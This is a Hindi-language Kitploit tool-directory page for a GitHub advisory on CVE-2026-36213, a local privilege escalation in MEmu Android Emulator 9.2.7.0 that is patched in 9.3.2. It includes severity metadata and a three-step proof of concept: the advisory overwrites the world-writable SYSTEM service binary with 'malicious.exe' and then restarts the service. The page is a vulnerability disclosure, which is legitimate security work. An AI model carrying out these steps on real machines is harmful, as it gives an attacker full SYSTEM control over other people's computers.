Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-36213 — CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 में असुरक्षित सेवा बाइनरी अनुमतियों के माध्यम से स्थानीय विशेषाधिकार वृद्धि | 9.3.2 में पैच किया गया | Kitploit
उपकरण/GitHubGitHub/sec-zone/cve-2026-36213
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 में असुरक्षित सेवा बाइनरी अनुमतियों के माध्यम से स्थानीय विशेषाधिकार वृद्धि | 9.3.2 में पैच किया गया

रिपॉजिटरी देखें
512 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-36213

CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 में असुरक्षित सेवा बाइनरी अनुमतियों के माध्यम से स्थानीय विशेषाधिकार वृद्धि | 9.3.2 में पैच किया गया

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

सारांश

MEmu Android Emulator 9.2.7.0 में स्थानीय विशेषाधिकार वृद्धि (LPE) भेद्यता।
सेवा MEmuSVC NT AUTHORITY\SYSTEM के रूप में चलती है, जबकि इसकी बाइनरी किसी भी स्थानीय उपयोगकर्ता द्वारा लिखने योग्य है, जिससे पूर्ण सिस्टम समझौता संभव हो जाता है।

फ़ील्डविवरण
CVECVE-2026-36213
उत्पादMEmu Android Emulator (MicroVirt)
प्रभावित संस्करण9.2.7.0 और पुराने
हल किया गया संस्करण9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

भेद्यता

MEmuService.exe असुरक्षित NTFS अनुमतियों के साथ SYSTEM-स्तर की Windows सेवा के रूप में स्थापित है:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

अवधारणा का प्रमाण (PoC)

:: चरण 1 - भेद्य अनुमतियाँ सत्यापित करें

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: चरण 2 - बाइनरी बदलें (निम्न-विशेषाधिकार उपयोगकर्ता के रूप में)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: चरण 3 - सेवा पुनः प्रारंभ करें

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: परिणाम: malicious.exe NT AUTHORITY\SYSTEM के रूप में चलता है

पहचान स्क्रिप्ट

यहाँ उपलब्ध: https://github.com/sec-zone/Hijack-service-binaries

अस्वीकरण

यह शोध जिम्मेदार प्रकटीकरण नीति के तहत शैक्षिक उद्देश्यों के लिए किया गया था।
लेखक इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

शोधकर्ता

नाम: Mohammad Hossein Ashofte Yazdi
लिंक्डइन: https://www.linkedin.com/in/seczone64
ट्विटर: @sec_zone64
ईमेल: [email protected]

टूल डाउनलोड करें